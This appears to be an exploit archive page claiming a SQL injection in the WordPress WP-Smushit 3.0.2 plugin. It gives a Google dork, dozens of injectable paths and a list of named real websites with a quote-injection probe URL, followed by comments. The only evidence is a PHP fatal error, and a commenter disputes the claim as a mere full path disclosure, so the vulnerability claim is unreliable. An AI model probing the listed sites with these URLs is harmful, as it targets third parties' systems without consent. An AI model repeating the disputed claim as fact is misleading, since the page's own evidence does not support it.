what you don't know can hurt you

WordPress WP-Smushit 3.0.2 SQL Injection

WordPress WP-Smushit 3.0.2 SQL Injection
Posted Jan 28, 2019
Authored by KingSkrupellos

WordPress WP-Smushit plugin version 3.0.2 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | c78331279d3b80174b45eed706b9c31b

WordPress WP-Smushit 3.0.2 SQL Injection

Change Mirror Download
####################################################################

# Exploit Title : WordPress WP-Smushit Plugins 3.0.2 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : premium.wpmudev.org
# Software Download Link : downloads.wordpress.org/plugin/wp-smushit.3.0.2.zip
# Software Information Link : wordpress.org/plugins/wp-smushit/
# Software Version : 3.0.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-smushit/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Description about Software :
**********************************

WordPress WP-Smushit - Smush Image Compression and Optimization Plugin =>

Smush has been benchmarked and tested number one for speed and quality and

is the award-winning, back-to-back proven crowd favorite image optimization plugin for WordPress.

Resize, optimize, optimise and compress all of your images with the

incredibly powerful and 100% free WordPress image smusher,

brought to you by the superteam at WPMU DEV!

####################################################################

# Impact :
**********

* WordPress WP-Smushit Plugins 3.0.2 is prone to an

SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied

data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database.

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/wp-content/plugins/wp-smushit/app/class-wp-smush-dashboard.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/class-wp-smush-nextgen.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk-settings/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box-header.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/bulk/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box-footer.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/cdn/upsell-meta-box-header.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/directory/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/integrations/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box-header.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/nextgen/summary-meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box-header.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/pro-features/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/settings/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/meta-boxes/summary/meta-box.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/modals/directory-list.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/modals/quick-setup.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/smush-page.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/tabs.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/app/views/wp-smush-nextgen-bulk-page.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-nextgen.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-gutenberg.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/class-wp-smush-s3.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-admin.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/nextgen/class-wp-smush-nextgen-stats.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/integrations/s3/class-wp-smush-s3-compat.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-ajax.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-async-editor.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-backup.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-cdn.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-png2jpg.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smush-resize.php?id=[SQL Injection]

/wp-content/plugins/wp-smushit/core/modules/class-wp-smushit.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Sites :
*************************

[+] brewurbancafe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] wegdermee.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] ootb.net.au/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] chefleticia.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] bonofe.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] kinetix365.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] maquilalama.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] tobaccoroadtours.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] harpreetkumar.com/hindi/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] 10minutos.com.bo/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] akarcenter.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] otherside-e.com/wp/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] bowgrid.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

[+] sportschampic.com/wp-content/plugins/wp-smushit/app/views/blocks/progress-bar.php?id=1%27

####################################################################

# Example SQL Database Error :
****************************

Fatal error: Uncaught Error: Call to undefined function esc_html__() in
/home/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
/blocks/progress-bar.php:17 Stack trace: #0 {main} thrown in /home
/brewurbancafe/public_html/wp-content/plugins/wp-smushit/app/views
/blocks/progress-bar.php on line 17

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Comments (3)

RSS Feed Subscribe to this comment feed
gilzow

*NOT* a SQL Injection. This is a fullpath disclosure vulnerability. Completely different.

Comment by gilzow
2019-02-01 18:45:25 UTC | Permalink | Reply
kingskrupellos

OK. I'll fix for the next time gilzow. Thanks. According to Owasp Security Research Center ; Full Path Disclosure vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source,require the attacker to have the full path to the file they wish to view. Reference Link : owasp.org/index.php/Full_Path_Disclosure There are not only path disclosure but there are many errors such Strict Standarts - Fatal Error ; You have an error in your SQL syntax ; etcetra. That's why I put as SQL injection for the title. On the other hand,I know but I thought so much what kind of title I can put for this vuln, finally I decided to put title as SQL Injection. Next time I'll put my discoveries such as [ WordPress WP-Smushit Plugins 3.0.2 SQL Injection ] full path disclosure. I could'nt find true CWE number. You are right. But this can be SQL injection, too. Because of [ You have an error in your SQL syntax ] errors. For the Full Path Disclosure ; By injecting unexpected data into a parameter. it’s possible to generate an error that will reveal the full path of the script.A remote user can determine the full path to the web root directory and other potentially sensitive information.To put it simply, Full Path Disclosure (FPD) is the revelation of the full path of a given file. FPD is performed by causing an error within a targeted website, which in turn, spits out an error message for an attacker to see. FPD vulnerabilities are generally looked upon as low risk and are too often overlooked by web-masters as nothing to worry about. While FPD vulnerabilities are low risk, they can be used in conjunction with other exploiting techniques and can often be the key to a successful hack. There are a number of ways to test for FPD vulnerabilities, each take little time to achieve. The first method is to find a page that calls from an array, for example: index.php?page=home. To check this for a vulnerability, one would add an inoperable value to the URL. There are a number of ways to do this. The most effective of which would be to add open and closed square brackets [] to the end of the page value, this makes the call for the page defunct. The URL for this example would be index.php?page[]=home. This method would call such errors as: Warning: opendir(Array): failed to open dir: No such file or directory in /home/www/example/kei/photo/index.php on line 297 Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131. FPD can also be used to reveal the underlaying operation system by observing the file paths. Windows for instance always start with a drive-letter, e.g; C:\, while Unix based operating system tend to start with a single front slash. Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2 Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2 The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames. If you add one comment for any topic - I understand it. And please do not comment to every title.[ This is not SQL inj but full of path disclosure. ] By the way, thank you for your comprehension. Reference Link for SQL injection => cwe.mitre.org/data/definitions/89.html The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes. For Example ; I got this error message => Strict Standards: Non-static method JLoader::import() should not be called statically in on line 34 According to the Inmotionhosting, This is not an actual 'error' message but merely an informational message meant more for developers. It does not mean that code needs to be altered in your script. SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database – letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things – by tricking the application into sending unexpected SQL commands. SQL injection weaknesses occur when an application uses untrusted data, such as data entered into web form fields, as part of a database query. When an application fails to properly sanitize this untrusted data before adding it to a SQL query, an attacker can include their own SQL commands which the database will execute. Attackers provide specially-crafted input to trick an application into modifying the SQL queries that the application asks the database to execute. This allows the attacker to: Control application behavior that’s based on data in the database, for example by tricking an application into allowing a login without a valid password Alter data in the database without authorization, for example by creating fraudulent records, adding users or “promoting” users to higher access levels, or deleting data
Access data without authorization, for example by tricking the database into providing too many results for a query
I put this vuln. as SQL injection because this error may show [ Fatal error: Uncaught exception .... ] MSAccess (Apache PHP)
So for example you can check here => securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html
MySQL Error Style: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 MSSQL ASPX Error: Server Error in '/' Application MSAccess (Apache PHP): Fatal error: Uncaught exception 'com_exception' with message Source: Microsoft JET Database Engine MSAccesss (IIS ASP): Microsoft JET Database Engine error '80040e14' Oracle Error:ORA-00933: SQL command not properly ended ODBC Error:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) PostgreSQL Error:PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1 or Query failed: ERROR: syntax error at or near "'" at character 56 in /www/site/test.php on line 121. MS SQL Server: Error: Microsoft SQL Native Client error %u201880040e14%u2019 Unclosed quotation mark after the character string. That's all what I want say. Thank you for your comprehension.

Comment by kingskrupellos
2019-02-02 21:40:23 UTC | Permalink | Reply
kingskrupellos

Dear Friend Gilzow - This is SQL Injection. IBMCloud has proven that this is SQL inj. vulnerability.
According to the IBMCloud => WP-Smushit Plugin for WordPress is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to various scripts using the id parameter to view, add, modify or delete information in the back-end database.
CVSS 3.0 Base Score 6.5 and CVSS 3.0 Temporal Score 6.3 and Exploitability is high.
Reference Links :
exchange.xforce.ibmcloud.com/vulnerabilities/156200
dl.packetstormsecurity.net/1901-exploits/wpsmushit302-sql.txt
Screenshot from IBMCloud => cdn.pbrd.co/images/I0PZnjF.png
As you said - This is a Full Path Disclosure, too.
But I wanted to draw attention only for SQL Inj Vuln.
That's it. Believe or don't believe - this is the reality.

Comment by kingskrupellos
2019-02-12 15:54:33 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close